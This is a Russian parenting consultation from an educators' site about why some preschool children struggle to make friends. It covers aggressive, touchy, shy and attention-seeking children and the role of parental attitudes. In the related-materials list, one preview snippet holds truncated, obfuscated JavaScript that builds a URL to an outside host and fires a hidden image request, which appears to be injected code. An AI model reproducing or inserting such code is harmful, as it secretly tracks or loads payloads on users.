Мама, со мной никто не дружит!
консультация по психологии (старшая, подготовительная группа)

Дружинина Юлия Александровна

В статье речь пойдет о проблемах, с которыми могут столкнуться дети, когда начинают взаимодействовать со сверстниками, в частности, почему ребёнок не умеет общаться с другими и ему сложно найти друзей. Разберем наиболее типичные для дошкольников варианты конфликтных отношений ребенка со сверстниками: повышенная агрессивность, обидчивость, застенчивость, демонстративность поведения.

Скачать:

ВложениеРазмер
Файл so_mnoy_nikto_ne_druzhit.docx18.15 КБ

Предварительный просмотр:

Мама, со мной никто не дружит!

 

Уже к старшей группе детского сада формируются достаточно устойчивые избирательные отношения. Дети начинают занимать разное положение среди сверстников: одни становятся более предпочитаемыми для детей, другие – менее.

Чем же определяется популярность ребенка среди сверстников и почему одни дети становятся привлекательными для большинства детей группы, а другие, наоборот, вызывают неприязнь и отталкивание?

К концу дошкольного возраста складывается более или менее определенный тип отношения к сверстнику, который либо обеспечивает нормальное общение и сотрудничество, либо ведет к трудностям в общении и к возникновению частых конфликтов с другими детьми. Проблемы и конфликты между детьми порождают тяжелые переживания (обиды, неприязнь, зависть, злость и др.).

Конфликтные дети, не умеющие общаться, слышать других, понимать их или уступать им, приносят массу проблем не только окружающим, но и самим себе.

Наиболее типичные для дошкольников варианты конфликтных отношений ребенка со сверстниками:

·       повышенная агрессивность;

·       обидчивость;

·       застенчивость;

·       демонстративность поведения.

Агрессивные дети

Главной отличительной чертой агрессивных детей является их отношение к сверстнику. Другой ребенок выступает для них как противник, как конкурент, как препятствие, которое нужно устранить.

Среди агрессивных детей выделяются три группы:

1. Первую группу составляют дети, которые чаще всего используют агрессию как средство привлечения внимания сверстников. Агрессия носит мимолетный, импульсивный характер, не отличается особой жестокостью и наиболее часто используется для привлечения внимания.

2. Во второй группе агрессивные действия используются для достижения конкретной цели (чаще всего — получить желанный предмет) и имеет более жесткие и устойчивые формы.

3. В третьей группе преобладающей мотивацией агрессии является беспричинное нанесение вреда сверстникам (агрессия как самоцель) и проявляется в наиболее жестоких формах насилия.

Таким образом, в основе детской агрессивности может лежать различная мотивационная направленность: в первом случае — спонтанная демонстрация себя, во втором — достижение своих практических целей, в третьем — подавление и унижение другого. Несмотря на эти очевидные различия, всех агрессивных детей объединяет одно общее свойство — неспособность видеть и понимать другого.

Другие люди выступают для него как внешние обстоятельства его жизни, которые либо мешают достижению его целей, либо не уделяют ему должного внимания, либо пытаются нанести ему вред. Ожидание враждебности со стороны окружающих не позволяет такому ребенку увидеть другого во всей его полноте и целостности, пережить чувство общности с ним.

Обидчивые дети

Феномен обиды во всей своей полноте начинает проявляться после 4—5 лет, что связано с появлением в этом возрасте потребности в признании и уважении — сначала взрослого, а потом и сверстника.

Именно в этом возрасте главным предметом обиды начинает выступать сверстник, а не взрослый. Обида на другого проявляется в тех случаях, когда ребенок остро переживает ущемленость своего «Я», свою непризнанность, незамеченность. К этим ситуациям относятся следующие:

•        игнорирование ребенка, недостаточное к нему внимание (например, ребенка не приглашают играть или не дают желанной роли);

•        отказ в чем-то нужном и желанном (не дают обещанной игрушки, отказывают в угощении или подарке);

•        неуважительное отношение со стороны других («обзывалки», «дразнилки»);

•        успех и превосходство других, отсутствие похвалы.

Во всех этих случаях ребенок чувствует себя отвергнутым и ущемленным.

Поведение детей в состоянии обиды имеет интересную и парадоксальную особенность. С одной стороны, это поведение носит явно демонстративный характер и направлено на привлечение внимания к себе. С другой стороны — дети отказываются от общения с обидчиком: молчат, отворачиваются, уходят в сторону.

Отказ от общения используется как средство привлечения внимания к себе, как способ вызывания чувства вины и раскаяния у того, кто обидел.

Попадая в конфликтную ситуацию, такие дети не пытаются ее разрешить, а, как бы, застревают в ней, погружаются в оценивание участников. Осуждение одних и оправдание других, главным образом, себя, является для них важным занятием, приносящим особое удовлетворение.

Характерные особенности личности обидчивых детей свидетельствуют о том, что в основе повышенной обидчивости лежит напряженно-болезненное отношение ребенка к себе и оценке себя.

Ребенку необходимо непрерывное подтверждение собственной ценности и значимости других. В то же время он приписывает окружающим пренебрежение и неуважение к себе, что дает ему мнимые основания для обиды и обвинения сверстников.

Застенчивые дети

Застенчивый ребенок — это такой ребенок, который, с одной стороны, доброжелательно относится к другим людям, стремится к общению с ними, а с другой — не решается проявлять себя и свои потребности, что приводит к нарушению взаимодействия.

Причина такого нарушения кроется в особом характере отношения застенчивого ребенка к самому себе. С одной стороны, ребенок имеет высокую общую самооценку, считает себя самым лучшим, а с другой — сомневается в положительном отношении к себе других людей, особенно незнакомых. Поэтому в общении с ними застенчивость проявляется ярче всего. Неуверенность в своей ценности для других не позволяет в полной мере удовлетворять потребности в совместной деятельности и в полноценном общении.

В общении с близкими людьми, где характер отношения взрослых ясен для ребенка, его тревога уходит в тень, а в общении с посторонними она опять выступает на первый план, провоцируя защитные формы поведения, которые проявляются в «уходе в себя», а иногда в принятии «маски равнодушия». Мучительное переживание своей уязвимости сковывает ребенка, не дает ему возможности проявить подчас весьма хорошие способности, выразить свои переживания. Но в ситуациях, когда ребенок перестает ждать оценки окружающих, он становится таким же открытым и общительным, как и его не застенчивые ровесники.

Демонстративные дети

В детском общении в возрасте 4—5 лет появляется конкурентное, соревновательное начало. Сверстник становится предметом постоянного сравнения с собой. Через сравнение своих конкретных качеств, навыков и умений ребенок может оценить и утвердить себя как обладателя определенных достоинств. Демонстрация своих преимуществ становится формой самоутверждения.Демонстративных детей выделяет стремление привлечь к себе внимание любыми возможными способами. Такие дети, как правило, достаточно активны в общении.

Демонстративные дети очень ориентированы на оценку окружающих, особенно взрослых. Как правило, такие дети стремятся, во что бы то ни стало, получить положительную оценку себя и своих поступков. Однако в случаях, когда отношения с воспитателем или группой не складываются, демонстративные дети применяют негативную тактику поведения: проявляют агрессию, жалуются, провоцируют скандалы и ссоры. Нередко самоутверждение достигается путем снижения ценности или обесценивания другого. Нередко дети пытаются доказать, что на месте сверстника они справились бы с заданием гораздо лучше. 

Когда взрослый дает отрицательную оценку действиям сверстника, демонстративный ребенок с жаром поддерживает его. В ответ на похвалу взрослого по отношению к своему сверстнику ребенок, напротив, начинает возражать, т. е. эмоциональная реакция ребенка на порицание и похвалу взрослым действий  сверстника у демонстративных детей носит негативный характер. В отличие от других проблемных форм межличностных отношений (таких, как агрессивность или застенчивость), демонстративность не считается отрицательным и проблемным качеством. Более того, в настоящее время некоторые особенности, присущие демонстративным детям, напротив, являются социально одобряемыми: настойчивость, здоровый эгоизм, способность добиться своего, стремление к признанию, честолюбие считаются залогом успешной жизненной позиции. Однако при этом не учитывается, что противопоставление себя другому, болезненная потребность в признании и самоутверждении являются зыбким фундаментом психологического комфорта и мотивации тех или иных поступков.

        Сравнивая разные типы проблемных детей, можно видеть, что они существенно различаются по характеру своего поведения и по степени трудностей для родителей и воспитателей. Одни из них постоянно дерутся, и приходится все время призывать их к порядку, другие спокойно сидят в стороне, третьи всеми силами стремятся привлечь к себе внимание, четвертые прячутся от посторонних глаз и избегают всяких контактов.

Однако, несмотря на эти очевидные различия в поведении детей, в основе почти всех трудностей в общении лежат сходные психологические проблемы. Суть этих проблем можно определить как фиксацию ребенка на себе (на оценке себя), или гипертрофированную самооценку.

Главной причиной конфликтов ребенка с собой и с другими является доминанта на собственной ценности и связанная с ней сосредоточенность на том, «что я значу для других».

Такой ребенок постоянно думает о том, как к нему относятся или как его оценивают окружающие, и остро, аффективно переживает их отношение.

Отсутствие чувства общности с другими всегда порождает одиночество, внутреннюю изоляцию в группе сверстников. Самоутверждение, демонстрация своих достоинств или сокрытие своих недостатков становится главным мотивом их поведения, при этом другие люди сами по себе вовсе не интересуют его.

У детей с разными формами конфликтного поведения доминирует предметное, объектное начало в самосознании (я — хороший) и в отношении к сверстнику, как к предмету сравнения с собой.

Что же формирует тот или иной тип отношения к другим детям?

Главным фактором, определяющим характер отношения к сверстникам, является отношение к ребенку близких взрослых, в котором закладывается фундамент его самосознания. Характер отношения ребенка к сверстникам зависит, прежде всего, от особенностей родительского воспитания.

Главное отличие заключается в том, что у родителей конфликтных детей значительно сильнее выражено нормативное, предметное начало, а это значит, что родители относятся к ребенку, преимущественно, как к предмету обучения и воспитания. Они фокусируют внимание ребенка на его достижениях, постоянно оценивают результаты его деятельности, сравнивают его с другими детьми, стремятся подчеркнуть его достоинства или недостатки другого. Поощрение, порицание и приведение положительных примеров являются главными методами воспитания. Родители имеют четкий, конкретный образ нормального, идеального ребенка, который становится критерием оценки реального сына или дочери, и постоянно сравнивают своего ребенка с ним. Этот образ заслоняет для родителя живого конкретного ребенка.


По теме: методические разработки, презентации и конспекты

ВИКТОРИНА ДЛЯ РОДИТЕЛЕЙ "ЯЗЫК РОДНОЙ ДРУЖИ СО МНОЙ"

МОЖНО ИСПОЛЬЗОВАТЬ ВМЕСТО АНКЕТИРОВАНИЯ ПЕРЕД РОДИТЕЛЬСКИМ СОБРАНИЕМ...

Что делать, если с вашим ребенком никто не дружит (советы психолога) ?

Как хорошо, когда есть друзья. Как интересно может быть в детском саду, если там есть с кем поиграть, пообщаться, придумать что-нибудь интересное... Но что делать, если ребенку не удается ни с кем под...

День здоровья в детском саду. Спортивные соревнования - «Папа, мама, спорт и я – крепко дружим мы всегда»

Разнообразие командных спортивных эстафет, поединков, смешанных единоборств, конкурсы капитанов,шуточные забеги.спортивные экспозиции с использованием атрибутики, речегимнастика, игры с болельщиками, ...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

памятка для родителей "Если с ребенком никто не дружит"

Памятка для родителей«ЕСЛИ С РЕБЁНКОМ НИКТО НЕ ДРУЖИТ» Каждому человеку нужны друзья. Друзья для маленького ребёнка – это возможность вместе познавать окружающий мир – мир...

Консультация для родителей "Прочитай мне сказку, мама, или с какими книгами дружить дошколятам"

Домашнее чтение способствует формированию в семье развивающей и доброжелательной среды. Читая вместе, вы стимулируете в ребенке интерес к жизни, даете ему возможность понять и оценить его значимо...

Если с ребенком никто не дружит

Каждому человеку нужны друзья. Друзья для маленького ребёнка – это возможность вместе познавать окружающий мир – мир предметов, игр и человеческих отношений на доступном языке. Отношения м...